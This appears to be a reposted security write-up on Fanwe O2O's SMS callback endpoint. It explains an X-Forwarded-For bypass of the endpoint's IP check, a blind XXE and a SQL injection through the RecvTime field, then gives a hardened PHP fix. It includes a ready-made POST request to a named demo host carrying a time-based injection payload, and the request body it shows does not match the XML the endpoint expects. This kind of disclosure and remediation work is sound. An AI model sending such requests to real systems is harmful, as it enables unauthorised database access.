Fanwe O2O commercial system SQL injection vulnerability + XXE entity Injection

Source: Internet
Author: User


Fanwe O2O, demo site address: http://o2odemo.fanwe.net//cpapi/qxtapi.php

define("FILE_PATH", "/cpapi");
require_once '../system/system_init.php';
$ip = CLIENT_IP;
$xml = file_get_contents('php://input');
if ($ip != '221.179.180.156' || $xml == "") {
    header("Content-Type:text/html; charset=utf-8");
    echo "非法访问"; // "Illegal access"
    exit;
}
$xml = str_replace(array("\r\n", "\r", "\n"), "", $xml);
$xml_arr = simplexml_load_string($xml); // raw POST body parsed with default options


In the code above, the IP address check can be bypassed with an X-Forwarded-For header, and simplexml_load_string() is called directly on the raw POST body, which gives XXE entity injection. Since nothing from the parsed document is echoed back, this is a blind XXE. I tested the official demo, but the data packet was not sent out; there may be many reasons (whether the host has outbound Internet access, or whether XML entities are restricted at a lower layer). I succeeded locally. Here the file contents are read back, base64-encoded, from my web logs:

This is not the focus. Continue to look at the code below. SQL injection is the focus:

$xml_arr = simplexml_load_string($xml);
$SrcMobile = $xml_arr->Body->Message->SrcMobile;
$Content = $xml_arr->Body->Message->Content;
$RecvTime = $xml_arr->Body->Message->RecvTime;
$arr = explode("-", $Content);
$prefix = $arr[0];
if ($prefix != 'U' && $prefix != 'V') {
    // RecvTime taken from the XML is handed to log_coupon() unfiltered as $query_id
    if (log_coupon("", "SMS content:" . $Content, $RecvTime) && $SrcMobile) {
        $msg_data['dest'] = $SrcMobile;
        $msg_data['send_type'] = 0;
        $msg_data['content'] = "SMS format error";
        $msg_data['send_time'] = 0;
        $msg_data['is_send'] = 0;
        $msg_data['create_time'] = NOW_TIME;
        $msg_data['user_id'] = 0;
        $msg_data['is_html'] = 0;
        $GLOBALS['db']->autoExecute(DB_PREFIX . "deal_msg_list", $msg_data); // insert
        echo "OK";
        exit;
    }
}


We can see that the content read from the XML is passed into the log_coupon function. Following it up:

function log_coupon($coupon_sn, $msg, $query_id = '') {
    $data = array();
    $data['coupon_sn'] = $coupon_sn;
    $data['msg'] = $msg;
    $data['query_id'] = $query_id;
    $data['create_time'] = NOW_TIME;
    // $query_id is concatenated straight into the SQL string: this is the injection point
    if ($GLOBALS['db']->getOne("select count(*) from " . DB_PREFIX . "coupon_log where query_id = '" . $query_id . "'") == 0) {
        $GLOBALS['db']->autoExecute(DB_PREFIX . "coupon_log", $data); // insert
        return true;
    } else {
        return false;
    }
}


It can be seen that query_id (that is, the RecvTime field in the XML) goes straight into the SQL statement. The demo site can demonstrate this as a time-based blind injection. POST the following packet:

POST /cpapi/qxtapi.php HTTP/1.1
Host: o2odemo.fanwe.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
X-FORWARDED-FOR: 221.179.180.156

133222211111231230'|sleep(5)#


The response comes back after a 5-second delay. A script can then enumerate the database username. See test code.

Solution:

Filter
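A hardened version of the handler, added here as an example and not Fanwe's own code: it ignores X-Forwarded-For, refuses any XML carrying a DOCTYPE and parses with network access disabled, and binds query_id as a parameter instead of concatenating it. It assumes a PDO connection in $pdo and the same DB_PREFIX and NOW_TIME constants the original uses.

```php
<?php
// Assumptions: $pdo is an open PDO connection; DB_PREFIX and NOW_TIME are
// defined by the application's own bootstrap, as in the original handler.

// 1. Trust only the transport-level peer address; X-Forwarded-For is attacker-controlled.
function client_is_allowed(array $server, string $allowed): bool {
    return ($server['REMOTE_ADDR'] ?? '') === $allowed;
}

// 2. Reject any document that declares a DTD (no DTD means no entities, so no XXE),
//    and parse with LIBXML_NONET so libxml cannot fetch external resources.
//    On PHP < 8.0 also call libxml_disable_entity_loader(true) before parsing.
function parse_sms_xml(string $xml) {
    if (preg_match('/<!DOCTYPE/i', $xml)) {
        return false;
    }
    $prev = libxml_use_internal_errors(true);
    $doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NONET);
    libxml_use_internal_errors($prev);
    return $doc;
}

// 3. Parameterised log_coupon(): query_id (RecvTime) is bound, never concatenated,
//    so a value such as 1230'|sleep(5)# is stored as a plain string.
function log_coupon_safe(PDO $pdo, string $coupon_sn, string $msg, string $query_id): bool {
    $sel = $pdo->prepare('SELECT COUNT(*) FROM ' . DB_PREFIX . 'coupon_log WHERE query_id = ?');
    $sel->execute([$query_id]);
    if ((int)$sel->fetchColumn() !== 0) {
        return false;
    }
    $ins = $pdo->prepare('INSERT INTO ' . DB_PREFIX . 'coupon_log'
        . ' (coupon_sn, msg, query_id, create_time) VALUES (?, ?, ?, ?)');
    return $ins->execute([$coupon_sn, $msg, $query_id, NOW_TIME]);
}

// Request flow, mirroring the original handler's structure.
if (!client_is_allowed($_SERVER, '221.179.180.156')) {
    http_response_code(403);
    exit;
}
$doc = parse_sms_xml(file_get_contents('php://input'));
if ($doc === false || !isset($doc->Body->Message)) {
    http_response_code(400);
    exit;
}
$m = $doc->Body->Message;
log_coupon_safe($pdo, '', 'SMS content:' . (string)$m->Content, (string)$m->RecvTime);
```

The DOCTYPE check is deliberately stricter than needed for this endpoint, since an SMS callback never has a legitimate reason to carry a DTD.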